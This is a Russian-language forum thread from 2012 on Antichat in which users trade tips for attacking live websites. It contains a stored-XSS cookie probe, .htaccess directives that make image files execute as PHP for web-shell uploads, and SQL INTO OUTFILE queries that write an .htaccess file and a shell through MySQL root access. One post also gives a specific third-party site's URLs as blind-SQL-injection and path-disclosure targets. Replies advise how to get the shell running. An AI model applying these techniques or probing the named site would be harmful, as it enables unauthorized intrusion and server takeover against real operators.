ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
25.04.2012, 08:46
|
|
Guest
Сообщений: n/a
Провел на форуме:
129743
Репутация:
92
|
|
Есть xss на одном ресурсе, не получается определить тип.
Создаю новость, вписываю в тело страницы
Сообщение от None
alert(document.cookie)
При обновлении, вылетает пустой алерт. В исходнике не отображается вписанный код. Первая мысль, что это DOM-BASED, но вся соль в том, что я ява-скрипт не вписываю через адресную строку, следовательно мой код где-то сохраняется, но когда после вылета алерта открываю исходник, то эксплойта нет!
не подскажите, что за бред с xss?) |
|
|
|
25.04.2012, 11:18
|
|
Новичок
Регистрация: 08.04.2010
Сообщений: 1
Провел на форуме:
70640
Репутация:
0
|
|
Сообщение от mix0x0
mix0x0 said:
Есть xss на одном ресурсе, не получается определить тип.
Создаю новость, вписываю в тело страницы
При обновлении, вылетает пустой алерт. В исходнике не отображается вписанный код. Первая мысль, что это DOM-BASED, но вся соль в том, что я ява-скрипт не вписываю через адресную строку, следовательно мой код где-то сохраняется, но когда после вылета алерта открываю исходник, то эксплойта нет!
не подскажите, что за бред с xss?)
Это DOM BASED
|
|
|
25.04.2012, 17:20
|
|
Guest
Сообщений: n/a
Провел на форуме:
45774
Репутация:
26
|
|
пытаюсь залить шелл (я могу заливать zip архивы, а на сервере он сам распаковывается), сам файл норм. заливается, но при открытии shell.php выскакивает ошибка:
Сообщение от None
Internal Server Error
The server encountered an internal error or misconfiguration and was unable to complete your request.
Please contact the server administrator, postmaster@site.com and inform them of the time the error occurred, and anything you might have done that may have caused the error.
More information about this error may be available in the server error log.
я так понял это из-за htaccess, попробовал залить свой htaccess с содержимым
Сообщение от None
AddType application/x-httpd-php .png
AddHandler application/x-httpd-php .png
но при попытки открыть shell.png он просто скачивается.
вообщем я хз что делать... |
|
|
|
25.04.2012, 17:54
|
|
Новичок
Регистрация: 03.12.2008
Сообщений: 5
Провел на форуме:
597696
Репутация:
1
|
|
ребят,подскажите,плз...в какую сторону копать?)...
сканнер показывает blind-sql здесь в параметре mna :
http://www.sexopera.eu/searchlo.php?aid=c1&defcountry=143&mxa=18&search=S earch&sexarray[]=male&srch=y&srchsexarray=1&mna=-89
http://www.sexopera.eu/searchlo.php?aid=c1&defcountry=143&mxa=18&search=S earch&sexarray[]=male&srch=y&srchsexarray=1&mna=89
здесь ошибка с раскрытием путей:
http://www.sexopera.eu/searchlo.php?aid=c1&defcountry=143&mxa=18&search=S earch&sexarray=male&srch=y&srchsexarray=1
можно ли раскрутить это скулю или это ошибка сканнера?
|
|
|
|
25.04.2012, 19:56
|
|
Guest
Сообщений: n/a
Провел на форуме:
10959
Репутация:
0
|
|
мел кто дело с SFTcms v 2.0?
Картинки заливаются, но куда, черт ногу сломит =/
|
|
|
|
25.04.2012, 20:24
|
|
Новичок
Регистрация: 08.04.2010
Сообщений: 1
Провел на форуме:
70640
Репутация:
0
|
|
Сообщение от Марок
Марок said:
мел кто дело с SFTcms v 2.0?
Картинки заливаются, но куда, черт ногу сломит =/
А посмотреть уже залитые картинке не?
|
|
|
|
26.04.2012, 00:52
|
|
Guest
Сообщений: n/a
Провел на форуме:
5300
Репутация:
5
|
|
подскажите, имеется доступ к mysql.root, как можно залить шел на сервере, CMS DLE 9,5
я делаю по 2 запроса одного типа
первый
Сообщение от None
select 'php_flag engine on
\r
AddType application/x-httpd-php .phtml .jpg .html
\r
AddHandler application/x-httpd-php .phtml .jpg .html' from mysql.user into outfile '/var/www/user/data/www/sait.idu/uploads/posts/2011-01/thumbs/.htaccess'
и второй сам шелл
Сообщение от None
select '' from mysql.user into outfile '/var/www/user/data/www/sait.idu/uploads/posts/2011-01/thumbs/s.jpg'
оба запроса в одну папку разумеется
всё заливается, и htaccess и шелл, но шел не открывает, хотя htaccess стоит "вроде бы" как положено..
Так же html и другие форматы заливаются типа .xss формат но уже Internal Server Error кажет
Что ещё можно залить вместо моего htaccess ? |
|
|
|
26.04.2012, 00:58
|
|
Новичок
Регистрация: 21.02.2009
Сообщений: 3
Провел на форуме:
58401
Репутация:
0
|
|
Сообщение от красавец
красавец said:
Что ещё можно залить вместо моего htaccess ?
либо я так сильно спать хочу и чего-то не понимаю, либо ты наркоман, но что мешает сделать into outfile в PHP файл?
|
|
|
|
26.04.2012, 01:09
|
|
Guest
Сообщений: n/a
Провел на форуме:
103014
Репутация:
76
|
|
Сообщение от красавец
красавец said:
подскажите, имеется доступ к mysql.root, как можно залить шел на сервере,
CMS DLE 9,5
я делаю по 2 запроса одного типа
первый
и второй сам шелл
оба запроса в одну папку разумеется
всё заливается, и htaccess и шелл, но шел не открывает, хотя htaccess стоит "вроде бы" как положено..
Так же html и другие форматы заливаются типа .xss формат но уже
Internal Server Error
кажет
Что ещё можно залить вместо моего htaccess ?
Прочитай .htaccess, может, там какие-то хитрые фильтры стоят при записи(то есть убедись, что все записалось нормально, нет лишних символов, перенос строки выполнен правильно)
Ну и да, как d1v сказал выше, что тебе мешает выполнить запрос select '' from mysql.user into outfile '/var/www/user/data/www/sait.idu/uploads/posts/2011-01/thumbs/s. php'
|
|
|
|
26.04.2012, 01:11
|
|
Guest
Сообщений: n/a
Провел на форуме:
5300
Репутация:
5
|
|
Сообщение от d1v
d1v said:
либо я так сильно спать хочу и чего-то не понимаю, либо ты наркоман, но что мешает сделать into outfile в PHP файл?
мешает то что php не открывается просто так
я пытался разумеется сначало php залить
|
|
|
|
|
|
|
|
Здесь присутствуют: 4 (пользователей: 0 , гостей: 4)
|
|
|
|
Похожие темы
Линейный вид
